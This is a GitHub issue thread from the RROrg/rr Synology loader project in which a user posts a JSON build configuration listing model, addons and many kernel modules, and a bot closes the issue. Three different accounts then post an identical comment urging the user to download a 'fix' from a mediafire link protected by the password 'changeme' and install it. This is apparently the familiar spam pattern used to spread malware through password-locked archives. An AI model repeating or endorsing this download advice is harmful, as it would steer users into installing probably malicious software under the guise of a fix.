RROrg/rr #2622: custom 2024-08-27

chl2018, 2024-08-27:
{"format":"img","language":"zh_CN","model":"DS918+","version":"7.2","addons":"acpid,mountloader,powersched,reboottoloader","modules":"8139cp,9p,9pnet,9pnet_virtio,aacraid,acpi-cpufreq,acpi_call,adm1021,adm1031,adm9240,adt7470,adt7475,aic94xx,alx,apex,aqc111,asix,ata_generic,ata_piix,atkbd,atl1c,atl1e,atlantic,auxiliary,ax88179_178a,b44,backlight,bcm-phy-lib,be2net,bitblit,bnx2,bnx2x,bnx2x_mod,bnxt_en,broadcom,btcoexist,button,cdc_ether,cdc_ncm,cdrom,cfbcopyarea,cfbfillrect,cfbimgblt,cfg80211,ch,ch341,cls_fw,cls_u32,cn,cp210x,cpufreq_conservative,cpufreq_governor,cpufreq_ondemand,cpufreq_performance,cpufreq_powersave,cpufreq_stats,cpufreq_userspace,crc-ccitt,crc-itu-t,cxgb,cxgb3,cxgb4,cxgb4vf,dm9601,dme1737,drm,drm_kms_helper,drm_panel_orientation_quirks,dvb-core,dvb-usb-dib0700,dvb-usb-dvbsky,dvb-usb,dvb_usb_v2,e1000,e1000e,eeprom_93cx6,efifb,efivarfs,ehci-hcd,ehci-pci,evbug,evdev,exfat,f71882fg,f75375s,fb,fb_sys_fops,fbcon,fbdev,font,ftdi_sio,gasket,hpilo,hpsa,hvc_console,hwmon-vid,i2c-algo-bit,i40e,i8042,i915,iavf,ib_addr,ib_cm,ib_core,ib_mad,ib_sa,ib_umad,ib_uverbs,ice,ide-core,ide-gd_mod,ide-pci-generic,igb,igbvf,igc,intel_auxiliary,iosf_mbi,ipv6,irqbypass,iscsi_tcp,it87,iw_cm,iwldvm,iwlmvm,iwlwifi,ixgb,ixgbe,ixgbevf,jc42,jme,kvm-amd,kvm-intel,kvm,lib80211,libiscsi,libiscsi_tcp,libphy,libsas,llc,lm75,lm78,lm90,lm95245,m88ds3103,mac80211,mdio,megaraid,megaraid_mbox,megaraid_mm,megaraid_sas,mii,mlx4_core,mlx4_en,mlx4_ib,mlx5_core,mlx5_ib,mlxsw_core,mlxsw_pci,mmc_block,mmc_core,mpt3sas,mptbase,mptctl,mptsas,mptscsih,mptspi,mt7601u,mtk-sd,mvsas,mwifiex,mwifiex_sdio,mwifiex_usb,nct6683,nct6775,netxen_nic,ntfs,p8022,pata_acpi,pata_legacy,phy-mt65xx-usb3,phy,piix,pl2303,pmbus,pmbus_core,prism2_usb,processor,psnap,qcaspi,qed,qede,qla3xxx,qlcnic,qlge,r8125,r8125_v9,r8126,r8152,r8168,r8169,r8169_lk,raid_class,rc-core,realtek,regmap-i2c,rndis_host,rtc-cmos,rtl8187,rtl8188ee,rtl818x_pci,rtl8192c-common,rtl8192ce,rtl8192cu,rtl8192de,rtl8192ee,rtl8192se,rtl8723-common,rtl8723ae,rtl8723be,rtl8821ae,rtl8xxxu,rtl_pci,rtl_usb,rtlwifi,rtsx_pci,rtsx_pci_sdmmc,rtsx_usb,rtsx_usb_sdmmc,sch_htb,sch_netem,sch_sfq,scsi_transport_sas,scsi_transport_spi,sdhci-acpi,sdhci-pci-data,sdhci-pci,sdhci-pltfm,sdhci,sdio_uart,sfc,sg,si2157,si2168,skge,sky2,softcursor,sp2,sr_mod,ssb,staging,stp,synobios,syscopyarea,sysfillrect,sysimgblt,tehuti,tg3,thermal,tps65217,ts2020,uhci-hcd,usbnet,usbserial,ushc,vesafb,vfio,vga16fb,vgastate,via-rhine,via-sdmmc,via-velocity,video,virtio,virtio_blk,virtio_console,virtio_input,virtio_mmio,virtio_net,virtio_pci,virtio_ring,virtio_scsi,vmw_pvscsi,vmw_vmci,vmxnet3,vub300,w83781d,w83793,wch,wch_pre,wireguard"}

closed 2024-08-27 by github-actions[bot]

FoioMikael, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

ESMELSTEPHANE24, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

NikhilKumar77777, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."